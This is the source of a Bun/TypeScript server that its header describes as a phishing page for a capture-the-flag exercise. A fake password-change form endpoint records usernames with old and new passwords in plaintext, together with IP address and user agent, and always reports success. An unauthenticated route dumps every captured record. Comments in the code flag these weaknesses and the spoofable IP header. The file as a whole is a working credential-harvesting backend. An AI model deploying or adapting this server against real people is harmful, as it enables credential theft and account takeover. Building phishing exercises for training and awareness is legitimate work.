A phishing page made for Crimson Defence CTF
import { serve, SQL } from "bun";
import homepage from "./public/index.html";
import adminpage from "./public/admin.html";

// SQLite database used by the exercise.
const DATABASE_URL = "sqlite://database.db";
const db = new SQL(DATABASE_URL);

// One row per submitted form. old_password and new_password are plain TEXT
// columns and the change-password handler inserts the submitted values
// unchanged, so database.db holds plaintext credentials: keep the file
// access-restricted and delete it when the CTF is over.
await db`
  CREATE TABLE IF NOT EXISTS passwords (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    username TEXT NOT NULL,
    old_password TEXT NOT NULL,
    new_password TEXT NOT NULL,
    ip_address TEXT NOT NULL,
    user_agent TEXT NOT NULL,
    timestamp TEXT NOT NULL
  );
`;
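/**
 * HTTP server for the CTF phishing exercise: serves the two HTML pages and a
 * small JSON API backed by the `passwords` table.
 */
const server = serve({
  routes: {
    // HTML imports
    "/": homepage,
    "/admin": adminpage,

    // API endpoints
    "/api/change-password": {
      /**
       * Records one submission of the password-change form and always answers
       * with a success payload; no password is changed anywhere.
       */
      async POST(req) {
        // The cast is compile-time only: a body that lacks these fields is not
        // rejected here and only fails later, at the NOT NULL columns.
        const { username, current_password, new_password } =
          (await req.json()) as {
            username: string;
            current_password: string;
            new_password: string;
          };

        // X-Forwarded-For is an ordinary request header. Unless a trusted proxy
        // overwrites it, the client chooses the value, so the stored address is
        // unverified and should not be treated as evidence of origin.
        const ip_address = req.headers.get("x-forwarded-for") || "unknown";
        const user_agent = req.headers.get("user-agent") || "unknown";

        // The tagged template binds each ${...} as a query parameter; nothing
        // is concatenated into the SQL text.
        await db`
          INSERT INTO passwords
            (username, old_password, new_password, ip_address, user_agent, timestamp)
          VALUES (
            ${username},
            ${current_password},
            ${new_password},
            ${ip_address},
            ${user_agent},
            ${new Date().toISOString()}
          )
        `;

        // Console output tends to survive in terminal scrollback and log
        // collectors, so the submitted passwords are deliberately left out of
        // this line; they exist only in the database row written above.
        console.log("Password change attempt:", {
          username,
          ip_address,
          user_agent,
        });

        // Simulate successful password change
        return Response.json({
          success: true,
          message: "Password changed successfully",
        });
      },
    },

    "/api/logs": {
      /**
       * Returns every row of the `passwords` table as JSON.
       *
       * NOTE(review): no authentication is visible on this route or on /admin,
       * so any client that can reach the server can read every stored row,
       * passwords included. Restrict access (bind to localhost or require a
       * credential) before the exercise is reachable by participants.
       */
      async GET() {
        const logs = await db`
          SELECT * FROM passwords
        `;
        return Response.json(logs);
      },
    },
  },

  // Enable development mode
  // NOTE(review): switched on unconditionally; confirm that is intended
  // wherever this server is reachable by anyone other than the operator.
  development: true,
});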
// Startup banner: print where the landing page and the admin dashboard are served.
const baseUrl = server.url;
console.log(`Phishing server running at ${baseUrl}`);
console.log(`Admin dashboard available at ${baseUrl}admin`);